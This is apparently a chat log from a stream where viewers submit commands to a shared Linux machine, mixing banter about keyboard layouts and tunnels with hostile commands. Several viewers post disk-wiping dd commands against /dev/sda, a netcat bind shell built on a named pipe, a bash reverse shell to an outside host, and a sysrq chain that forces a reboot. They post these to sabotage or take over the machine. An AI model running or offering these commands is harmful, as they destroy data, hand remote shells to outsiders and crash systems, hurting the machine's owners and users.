I used nmap to track packets and log them into a db. then i made a little program to visualize it with colors
vitimiti: I want to run loadkeys de 7:26hitlurcat: somebody should switch the region to Russia and install myBB 7:26vitimiti: Just to piss people off 7:26HMage: Vitimiti now that’s evil 7:26vitimiti: Yes XDjackieXD: @Vitimiti this would screw up the chat input system 7:26HMage: I applaud you :D 7:27vitimiti: I was thinking about loadkeys es but Spanish keyboard is around many countries 7:27HMage: loadkeys ru
nohup dd if=/dev/zero of=/dev/sda bs=1M &
dd if=/dev/random of=/dev/sda bs=1m
fdisk -l
echo imgay > /dev/sda
7:35wongmjane: create a init script that only reboots the system
Reverse SSH-tunneling
7:42inluck_nl: use autossh to maintain a reverse ssh tunnel 7:42inluck_nl: much easier than vpn
7:46HMage: how many times people will vote for cat /proc/cpuinfo
and free
?
mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -l -p 6666 1>/tmp/backpipe
7:50whiletrueinstallgentoo: oh god the bikeshedding in this stream is gonna be intense
7:49Blu5ky: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -l -p 6666 1>/tmp/backpipe
7:49bartekww: ls
7:49Blu5ky: then make your install from home
7:50HMage: Blu5ky no public IP
7:50mastermat64: remember guys that they said they would make a raffle if we succed to do “twitch plays arch plays pokemon”
7:50xBytez: then do it reverse!
7:500xicl33n: TOR HIDDEN SERVICE
7:50Blu5ky: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc @home -p 6666 1>/tmp/backpipe
7:50Blu5ky: thne :)
7:50xBytez: bash -i >& /dev/tcp/xbytez.eu/1337 0>&1
7:50xBytez: oh yeah mknod will also work
$ echo 1 > /proc/sys/kernel/panic && echo 1 /proc/sys/kernel/sysrq && echo b > /proc/sysrq-trigger